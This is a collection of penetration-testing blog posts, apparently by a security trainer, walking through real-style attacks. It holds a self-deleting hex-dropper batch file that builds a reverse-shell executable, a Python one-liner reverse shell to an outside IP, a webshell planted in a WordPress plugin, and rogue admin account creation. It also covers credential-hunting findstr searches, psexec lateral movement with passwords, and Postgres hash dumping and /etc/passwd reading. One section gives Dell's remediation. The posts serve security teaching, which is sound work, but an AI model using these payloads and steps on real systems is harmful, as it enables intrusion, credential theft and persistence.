echo e 0300 >>1234.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 b0 42 00 00 bd 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c 06 32 40 07 6a 01 e8 0e 7c 38 55 0c e8 42 02 c8 15 38 9e 6a 7e 38 ea 53 0c 7a 50 2c 16 74 41 30 fd 01 bf 55 b2 b1 33 6a 91 02 06 b2 7c 55 9a 27 a3 78 83 66 c7 05 64 7b 4f a6 38 67 bc 5d 50 66 94 3d 39 66 a3 68 7e 64 66 7e 21 7d 8b 73 0c d9 0a 6a 68 94 2d a1  >>1234.hex

echo e 0380 >>1234.hex && echo 3a 7a 6f 48 15 ea 4c 05 11 50 64 90 10 4d 44 55 91 14 3c 40 78 6a 28 10 68 5d 28 ff 35 30 74 e8 a4 9e 51 54 55 a1 55 8d bf 6e 0e 0a 08 90 22 0b e1 51 14 e8 1f 81 4b c3 ff 25 24 20 bb 6f 2a 1c 06 43 18 21 14 bd c3 22 08 71 cc 01 55 8b ec 81 c4 7c fe ff 88 56 57 e8 60 ac dd 89 45 fc 33 1d c9 8b 75 7e 38 3c 1d 74 07 1e 22 40 f7 41 eb f4 51 d1 72 e9 00 e1 58 3b c1 74 0b 5f 5e 30 b8 03  >>1234.hex

echo e 0400 >>1234.hex && echo b9 c9 c2 08 e1 86 49 8d bd 3c 70 e5 43 2a 09 cf 2f e0 02 b0 20 aa eb 73 f2 28 8d 85 15 39 8b f0 36 f8 33 2a 33 eb 1b 8b 03 66 32 07 ef 22 65 20 4d fe 22 11 e1 28 2d ed 94 08 83 b9 dc b7 30 4b 74 fb 3b 3a 4d 08 a8 15 59 65 1d 67 0a 4c 13 41 1d 0f 14 eb e6 aa 0d 36 07 19 87 38 f4 b0 7f c0 55 73 11 8b 7d 0c c6 17 b8 02 7f 82 a2 13 9d 68 b0 a0 58 34 33 0d 46 0d e6 d1 f7 e1 fe 58 a3 ee  >>1234.hex

echo e 0480 >>1234.hex && echo e7 44 bb 1f 16 a9 ce 11 04 de 55 01 3c d4 14 d4 0e 1b 33 c0 4e ec 87 0b 70 d2 8a 06 46 3d 3c 02 b3 12 0e f7 df 90 eb 0b 2c 30 19 8d 0c 89 06 48 83 2d 0a c0 75 f1 e8 04 11 33 51 c2 38 e2 30 83 c4 07 f4 6a f5 e8 69 09 19 49 ff bd 82 aa 20 0b d0 2a 93 75 37 f8 50 22 9d 29 86 06 fc e8 4d 2f 68 8b 24 38 e6 53 1a 0f 08 8d 50 03 21 18 83 c0 04 e3 f9 ff fe 80 02 f7 d3 23 cb 81 e1 44 80 74  >>1234.hex

echo e 0500 >>1234.hex && echo 7c e9 6c c1 0c 60 75 77 06 f4 10 c0 40 02 d0 e1 1b c2 51 5b 3a 47 c4 49 19 ca 0c 57 06 08 30 00 00 30 40 00 63 30 6d 64 00 66 3f 40 00 14 38 20 40 03 77 73 32 5f 33 98 2e 64 6c e3 c0 80 67 07 65 74 68 6f 73 40 62 79 6e 61 7b 6d cf 1e 63 9e 3c f7 eb ff 0e 12 57 53 41 5d cf 61 72 46 75 70 18 79 68 ca 2c 73 13 4f 26 63 6b 62 ef c1 ff b8 03 6c 95 1a 72 ca 5e 6c 4c c7 57 d3 69 74 f3 46  >>1234.hex

echo e 0580 >>1234.hex && echo a7 bc 91 47 c3 4c 43 6f 6d 88 61 6e 64 36 4c 69 44 62 7e 80 76 72 fb 9d 3a 50 b7 82 e7 73 15 41 58 21 c0 64 48 d0 43 2f 60 00 00 00 00 00 66 3f 40 00 4c 6f 61 64 4c 69 62 72 61 72 79 41 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 40 00 00 e9 74 be ff ff 00 00 00 02 00 00 00 0c 40 00 00  >>1234.hex

echo r cx >>1234.hex && echo 04ef >>1234.hex && echo w >>1234.hex && echo q >>1234.hex && debug<1234.hex && copy 2.dll reverse.exe && del 2.dll && del 1234.hex

rem *******************EDIT YOUR HOSTNAME AND PORT HERE*************************

reverse.exe 192.168.2.18 31337

deleteit:

del reverse.exe

IF EXIST reverse.exe GOTO kill

del %0 

:kill

BYPASSING RESTRICTED ENVIRONMENTSBypassing

The code looks very similar to bind.bat from the last exercise. Essentially this is doing the same thing, which, is creating a hex file and DLL file that build an executable. The program is then run (and subsequently the shell sent) and then it gets deleted.

first of all, we need to set our evil hacker box to listen on a port, let’s choose 31337 for this exercise. We will be using netcat again (isn’t it an excellent tool) to listen on port 31337:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

Next, we simply run the batch file on the target machine:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

And like clockwork, we finally have our shell!

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Escaping and getting a command prompt

First things first, we need a command prompt before we can do anything else.  Next, we will navigate to the task manager using Ctrl+Alt+Delete.  Then, go to File > New Task (Run…) and type in cmd.exe.  That will spawn a new command prompt (in the case that there is no physical keyboard present, you can start a new task and type in “osk.exe” for an onscreen keyboard):

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Here is an image of the On-Screen Keyboard:

BYPASSING RESTRICTED ENVIRONMENTSBypassing

 

Next, use Internet Explorer (or whatever browser they have installed, but there is a good chance it is IE) to navigate to a website that hosts your favorite tools and exploits. Whew…well alrighty then… I hope that you enjoyed this blog post.

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Let’s call it quits right there, and I’ll come back in a day or so and give you something else to chew on.

Show me some love and tweet this
Tweet: Check out a cool blog post from @j0emccray on Bypassing Restricted Environments.Bypassing Restricted Environments

Happy Hacking

Using APT tactics and techniques in your pentests

I have a student that has been asking me about internal network penetration testing. As a result, I figured I’d write a blog post about APT tactics. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy. On the other hand, moving around a network and stealing data without getting caught is the real skill. Certainly, you will want to use Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threat (APT).

When I do network penetration tests, I always explain to the customer that there are four levels of post exploitation. Therefore, they need to choose what level they want me to use based on the goals of the test.

  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from initially compromised hosts and move further to other hosts in the network.
  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials
  • Level 4:  Long term command and control (C2) – staying persistent in the environment for a prolonged period then exfiltrating data out of the network.

Meanwhile, I’ll try to cover a few of things we pentester’s do on internal pentests to data mine the network.

Data Mining The Host

At this point, you just broke into a machine with a browser, PDF, or Java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like ‘winenum.rb’, ‘enum_domain_user’, file_collector.rb, int_doc_find.rb or similar scripts. Even so, I am going to try to walk you through doing this stuff without meterpreter scripts and from here on, you will better understand what those scripts are doing or write your own.

Meanwhile, let’s start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a “/k” -i

 

APT

APT tactics

Then, let’s figure out which updates got installed on this computer with DISM? Windows 7/8 (note: DISM will return far more details than WMIC.):

c:\DISM /Online /Get-Packages

 

APT

APT tactics

or:

c:\WMIC QFE List

 

APT

APT tactics

ok, now that we have a regular command prompt, next, we will search the drive and sort the files by time accessed.

We can use this to find necessary files by typing:.

c:\dir C:\ /S /OD /TA

APTAPT tactics

Alternatively, if you know the date that a particular file got created, then you can search the drive and sort them by time created by typing:

c:\dir C:\ /S /OD /TC

APT

 

APT tactics

Elsewhere, you can also do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:

c:\dir C:\ /S /OD /TW

 

APT

APT tactics

 

Meanwhile, here is a trick that I use a lot presently is to search the drive for files with business-critical words in the file names. I type the following:

c:\dir c:\*bank* /s

APTAPT tactics

 

Even more, c:\dir c:\*password* /s

APTAPT tactics

Then, c:\dir c:\*pass* /s

APTAPT tactics

Even more, c:\dir c:\*competitor* /s

APTAPT tactics

Also, c:\dir c:\*finance* /s

APTAPT tactics

This is another set of goodies for financial and risk related data.

c:\dir c:\*invoice* /s

c:\dir c:\*risk* /s

c:\dir c:\*assessment* /s

Further, these are good when you are looking for specific file types, for instace, (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).

c:\dir c:\*.key* /s

c:\dir c:\*.vsd /s

c:\dir c:\*.pcf /s

c:\dir c:\*.ica /s

c:\dir c:\*.crt /s

c:\dir c:\*.log /s

Especially relevant, I look hard for .pcf and .ica files.

Anything that can give me legitimate access to the network. Besides, there is no better backdoor than authorized access.

As a matter of fact, I did have had a pentest where the customer had the password file with the name GeorgeBush.xlxs – (yes, every network has a password text file or spreadsheet). Evidently, a penetration tester before me found the password file when it was called passwords.Xlsx. Later, they renamed the file. However, one can search a drive for files with critical data by other means besides using their name. One can type:

c:\type c:\sysprep.inf

c:\type c:\sysprep\sysprep.xml

c:\findstr /I /N /S /P /C:password *

c:\findstr /I /N /S /P /C:secret *

c:\findstr /I /N /S /P /C:confidential *

c:\findstr /I /N /S /P /C:account *

c:\findstr /I /N /S /P /C:payroll *

c:\findstr /I /N /S /P /C:credit *

c:\findstr /I /N /S /P /C:record *

Show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests

Active Directory Enumeration

In the meantime, you have pilfered the host you compromised. It’s time to spread your wings and look for new prey in the network. Next, we will move on to active directory enumeration. For this reason, I will write another blog post on lateral movement later.

Often, I like using the net view command in looking for other hosts in the network.

c:\net view

APT tactics

 

In addition, We can run net view /domain to acquire a list of domains and workgroups in the target environment.

c:\net view /domain

APTAPT tactics
Next, let’s look for local users (Always check this. You’ll run into a network that uses local accounts for stuff every once in a while ). System administrators often make use of local users and groups sometimes. They employ them in system administration tasks as a means of restricting access to the domain. Strangely enough, this can be good if done very carefully. On the other hand, it could be atrocious as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\net user

APTAPT tactics

At this point, let’s grab a list of users in the domain.

c:\net user /domain

APTAPT tactics

For the same reason we checked for local users, it is necessary that we check for local groups as well.

c:\net localgroup

APTAPT tactics

Then, c:\net localgroup /domain

APTAPT tactics

 

Then, c:\net localgroup administrators

APTAPT tactics

Now, it’s time to get serious. The next few commands are where I get the best info.

c:\net localgroup administrators /domain

APTAPT tactics
Finding out the users in the domain is always handy. However, there is nothing like the next command.

c:\net group “Domain Users” /domain

At this point is where you make your money. Occasionally, I like to look for users in the Domain Admins group. After compromising my first host, then, I spear phish any user I find in the Domain Admins group. That’s rather the fastest way to gain domain admin level access for me.

c:\net group “Domain Admins” /domain

APTAPT tactics

net user “jima” /domain

APTAPT tactics

OK, at this point, let’s start moving around the network.

No Nmap – no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.

Meanwhile, more pingsweep.bat

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186

187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat

APT tactics

Afterward, all you have to do is just type ‘pingsweep‘ and then the first 3 octets of the target subnet.

pingsweep 10.10.30

APTAPT tactics

Meanwhile, if you need to generate a list of IP addresses you can use this quick for a loop.

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt

APTAPT tactics

further, let’s echo some domain names into a text file.

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt

more names.txt

APTAPT tactics

Then, we can use a for loop to look for logged in users

for /f “tokens=1” %a in (‘net view ^| find “\\”‘) do @echo %a >> hosts.txt

APTAPT tactics

PsExec

After you come across machines where users are logged in, and you have their passwords or hashes, you can further PSExec the machines. Nonetheless, I acknowledge that I skipped password stealing and hash dumping. I will cover it in another article if you guys still want me to.

PSExec in Windows

c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p [email protected]! cmd.exe

PSExec in Linux


Meanwhile, just for the sake of making sure that you have this syntax – here is how to do PSExec in Linux. I prefer to use a tool called
winexe. Besides, I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz

wget https://s3.amazonaws.com/StrategicSec-Files/winexe

chmod 777 winexe

./winexe -U Administrator%[email protected]! //WIN7-X64-1 cmd.exe

APTAPT tactics

 

APTAPT tactics

Here is how I figure out how many users are logged on/connected to a server?

NET SESSION | FIND /C “\\”

Finally, just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). At the same time, do all of the dir commands again, and you do all of the findstr commands again. Grab all of the necessary files then map a drive to what you want to become your staging server. Then, copy all of the necessary files to that staging server. In conclusion, here is how to map a network drive.

net use O: \\10.10.30.89\c$  /u:administrator [email protected]!

net use /d O:

Picture8APT

Whew, this was quite a long blog post. We covered a lot today, however, there is a lot we didn’t cover. We didn’t cover password stealing, hashdump, pass the hash, as well as data exfiltration.

Finally, I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Let’s call it quits right there, and I’ll probably come back in a day or so and give you something else to chew.

 

Finally, please show me some love and tweet this
Tweet: Check out the blog post 'Using APT tactics and techniques in your pentests' by @j0emccrayUsing APT tactics and techniques in your pentests

ATTACKING DELL FOGLIGHT SERVER

I was just talking to someone a little while ago, and I told them how I rarely run into Postgres on pentests. However, I have run Foglight, which is a Postgres based product. Ok, so what is a Dell Foglight box? A while back, I ran into one of these while I was on a pentest.

Meanwhile, let’s see…”Dell’s application performance monitoring (APM) solution, Foglight, blends business context with deep technical insight, unifying all users and data within a structured model built around transactions – leveraging our patent-pending Transaction DNA technology.

Source: http://software.dell.com/products/foglight-application-performance-monitoring/

Next, here is a quick walk-through of me attacking Dell Foglight using Nmap NSE, some Postgres syntax, Metasploit, as well as a free rainbow table website called CrackStation.net. It also covers the proper remediation for the attack. Yes, basically, I sanitized a pentest compromise notification document and then later turned it into a blog post. But C’mon it’s been a really busy week and this is still good stuff.

In the meantime, we will get started….

My Attack Virtual Machine

Here is the virtual machine that I used for this:

https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip

username: strategicsec

password: strategicsec

Nmap Syntax

At this point, we use Nmap to show possible ways an attacker would identify a host running postgres.

First, we scan the system with port TCP 5432 to verify the host is running PostgreSQL:

sudo nmap -sV -p 5432 XXX.XXX.XXX.XXX

DellDell Foglight

 

Next, we execute the NSE script “pgsql-brute” against the system:

sudo nmap -sV -p 5432 –script pgsql-brute XXX.XXX.XXX.XXX

DellDell Foglight

 

NMap Attack Syntax Reference:

http://nmap.org/nsedoc/scripts/pgsql-brute.html

PSQL Attack Syntax

Here, we use the command-line Postgres client ‘psql’ to connect to the database:

Psql -h XXX.XXX.XXX.XXX -U Postgres -W Postgres

Dell Foglight

Dell

 

Next, we list all the databases on the postgres system:

\l

 

Dell FoglightDell

Afterward, we list the usernames, and MD5 hashed passwords (For the database and not the system)

select username, passwd from pg_shadow;

Dell Foglight

Next, we select the current database:

select current_database();

Dell Foglight<

 

Next, we create a temporary table called “secureninja” to store any data that we later might want to examine:

create table secureninja (input TEXT);

Dell Foglight

 

Next, we copy the /etc/passwd file into the secureninja table that we just created:

copy secureninja from ‘/etc/passwd’;

Dell Foglight

Next, we display the /etc/passwd data that we copied into the secureninja table:

select input from secureninja;

Dell Foglight

 

Next, we delete the temporary table from the customer database:

drop table secureninja;

Dell Foglight

 

Next, we exit the Postgres database:

\q

Dell Foglight

 

Using a website like https://crackstation.net/, we can check the hashes for each database user (vkernel, root, Postgres)

https://crackstation.net/

 

Dell Foglight

Dell Foglight

 

Dell Foglight

 

Dell Foglight

 

Here we start to use a common hacker tool call Metasploit to attack the database:

cd /home/strategicsec/toolz/metasploit

sudo ./msfconsole

Dell Foglight
Here you can see that the Metasploit Framework has loaded to its main page:

 

Dell Foglight

 

Here we use Metasploit to dump the Postgres database hashes:

use auxiliary/scanner/postgres/postgres_hashdump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

Dell Foglight

 

Next, we use Metasploit to dump the Postgres database schema:

use auxiliary/scanner/postgres/postgres_schemadump

set PASSWORD postgres

set RHOSTS XXX.XXX.XXX.XXX

run

Dell Foglight

 

Here you can see that Metasploit successfully dumped the postgres database schema:

Dell Foglight

Alright, now on to how to fix this. Before we cover how to fix it – quick shameless plug:

I’d love it if you check out the Metasploit Next Level Video Series for only $50:

http://strategicsec.com/product/metasploit-next-level-video-series/

Remediation

Dell provides documentation on how to fix this vulnerability.

How to change the default passwords for the embedded PostgreSQL database.

Description

How to change the default passwords for the embedded PostgreSQL database for the users vkernel and Postgres.

Resolution

Log into the console of the virtual appliance, either directly in vSphere Client/Hyper V Manager or establish an ssh connection using a suitable application.

  • Log in using userid vkernel(default password vkernel)
  • Then become the root user using the command su – (default password password)
  • Issue the command /usr/local/vkernel/scripts/externalDbAccess.sh then press ENTER
  • Follow the prompts, as shown below:

VKernel-vOPS:~ # /usr/local/vkernel/scripts/externalDbAccess.sh
1 – Enable the embedded database access from the outside world
2 – Disable the embedded database access from the outside world
3 – Set the database users’ passwords

Please select one of the above:3
Stopping VKernel collector…
Initiated collector shutdown. It will take some time for the running collection tasks to complete.
We have now stopped VKernel collector
done
Stopping VKernel monitor…
VKernel monitor has been stopped
done
Stopping tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat stopped
Please enter the new password for the database role postgres:
Please retype the new password:
Please enter the new password for the database role vkernel:
Please retype the new password:
Unregistering the appliance from previous database…
Unregistering the appliance from the previous database is done
Migrating Hyper-V collector…
Migrating Hyper-V collector gets done
Updating database multi-appliances registry…
Updating database multi-appliances registry gets done
Updating VKernel configuration…
Updating VKernel configuration is done

Configuration completed
applying the password for user Postgres
applying the password for user vkernel
Starting tomcat…
Using CATALINA_BASE: /usr/local/tomcat
Using CATALINA_HOME: /usr/local/tomcat
Using CATALINA_TMPDIR: /usr/local/tomcat/temp
Using JRE_HOME: /usr
Using CLASSPATH: /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar
Tomcat started in normal mode
Starting VKernel monitor…
VKernel vOPS Server 6.0: Build 120918.1924. Schema: 8-11.55
We have now started VKernel monitor
done
Starting VKernel collector…
VKernel vOPS Server 6.0. Build: 120918.1924. Schema: 8-11.55
VKernel collector has been started
done
VKernel-vOPS:~ #

Remediation reference:

https://support.software.dell.com/foglight-for-virtualization-standard-edition/kb/99015

PIVOTING TO THE INTERNAL NETWORK

Several months back, I ran a penetration test on WordPress. It was a generic web application security assessment. However, in this instance, I was managed to compromise the server and most importantly, to do pivoting through the internal network. I figured out I’d take the compromise walk-through and turn it into a blog post for you guys today. And so, let’s do this.

Although I ran several vulnerability scanners including Nessus, OpenVAS and HP Web Inspect against the target website during the penetration test, it was Acunetix that gave me the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a wp_config file which is usually not viewable externally. Probably, there was an issue while the developer or system administrator was working on the server. Maybe, he or she got disconnected from the server while editing the file and that caused the text editor (vi for example) to create a backup file called wp_config~ Wow – can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner

PIVOTING

Additionally, the Acunetix web vulnerability scanner identified the backup of a configuration file that contained database passwords located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings – You can get this info from your web host ** //

/** The name of the database for WordPress */

define(‘DB_NAME’, ‘targetcompany_blog’);

/** MySQL database username */

define(‘DB_USER’, ‘targetcompanywp’);

/** MySQL database password */

define(‘DB_PASSWORD’, ‘weakpassword123’);

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in my scan data from the other vulnerability scanners that the target server w/as behind a Cisco ASA Firewall and the database port 3306 was not externally accessible. As a result, I couldn’t connect to the database directly because of the firewall not allowing access to the MySQL database port 3306.

It’s very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database. Luckily for me, the target-company is running phpMyAdmin. Since I have database passwords, I guessed that the password for the target-company wp account which was weakpassword123 could also be the same password for the database administrative level account named root, and I was correct – it worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/

PIVOTING

Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.

PIVOTING

Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany

· targetcompany_blog

· white_papers

PIVOTING

Step 5: View the users and their respective privilege levels

Next, I have moved on to the privileges tab to see what level of privileges that each user has. I hit the jackpot by being the root user. Most of all, I have ‘ALL PRIVILEGES’

PIVOTING

 

Step 6: I can export all of the databases

If the goal of the attacker is to steal as much as possible, then the export option would, therefore, be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters – NOT hackers. As a result, the last thing you want to do as a pentester is actually to possess a customer’s business critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.

PIVOTING

Step 7: Usernames and passwords

Afterward, I switched to the user’s table in the target-company database. Here, I see that the passwords for ALL of the customers are stored in clear text. Under those circumstances, I had to let the client know that is not a good idea.

PIVOTING

 

..and more usernames and passwords

PIVOTING

again, more usernames and passwords

PIVOTING

and again more usernames and passwords

PIVOTING

 

Step 8: Looking at the MySQL database

I switched to the user table in the MySQL database. I see here that WordPress has hashed passwords. The database has hashed passwords too.

PIVOTING

 

 

Step 9: Attacking WordPress

I switched to the wp_users table in the target-company_blog database. I see here that WordPress has properly hashed and salted passwords.

PIVOTING

 

Step 10: Create a privileged account in WordPress

Here I am creating a privileged account named joe_strategicsec in WordPress. Creating the account is a multi-step process which you will see in the following screenshots.

PIVOTING

After filling out the menu items required to the create the account you’ll see the SQL statement execution.

PIVOTING

 

Then after filling out the meta_key field menu item ‘wp_capabilities’ required to set the privilege level of the account you just created then you’ll see the SQL statement execution.

PIVOTING

 

PIVOTING

 

After filling out the next meta_key field menu item ‘wp_user_level’ required to set the privilege level of the account you just created then you’ll see the SQL statement execution.

PIVOTING

 

PIVOTING

 

Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account that gets created in the WordPress database. Ok, well it is covered in red but just trust me it’s there.

PIVOTING

Step 12: Login to the newly created WordPress account

PIVOTING

I have logged in as user joe_strategicsec, so I can now see WordPress Dashboard.

Step 13: WordPress Users

Here I view the WordPress users

PIVOTING

 

Step 14: Backdooring a WordPress plugin

I quickly switch to the plugins section and back door the Akismet plugin by replacing the source code of one of the pages with a PHP webshell.  The code for a website is pretty easy – it’s just a few lines of PHP.

PIVOTING

 

Step 15: Accessing the webshell

One can find the WordPress plugin that got converted to a webshell at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server’s internal IP address, you can execute the command:

/sbin/ifconfig

PIVOTING

 

To get the Linux server’s version you can execute the command:

cat /etc/issue

PIVOTING

To get the Linux server’s kernel version you can execute the command:

uname –a

PIVOTING

 

Step 16: Use Python to create a reverse shell

Executing system commands via a webshell is often required when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me since outbound firewall rules are often less restrictive than inbound firewall rules.

Inside of the webshell I can use python to create a reverse connecting network socket that encapsulates the Linux command shell. I do this by typing the following syntax into the webshell (yes I know that there there is no screenshot, but in the webshell just type the following line of python):

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“54.186.248.116”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Now, you’ll see in the screenshot below that I have a netcat listener that receives a connection from the compromised server.

PIVOTING

 

Here you’ll see that I do a /sbin/ifconfig and the host has a 192.168 address, so I know that this box is on an internal network.

PIVOTING

 

PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop to ping the entire subnet.

PIVOTING

 

 

Step 18: No Nmap installed so went for a command-line ping sweep

PIVOTING

At this point, I opted to end this portion of the engagement and notify the client that no further exploitation is required. It would only be a matter of time to achieve root access on this server via local privilege escalation, then install more hacking tools and pivot further into the internal network.

I hope that you like this blog post, and I do apologize for the pictures being fuzzy, but I had to take them out of a pentest document and sanitize them. I decided to write this blog post because I thought it would be a good example of the kinds of things that I’ll be covering in the new Pentester Lab Network when I hope that you will check out.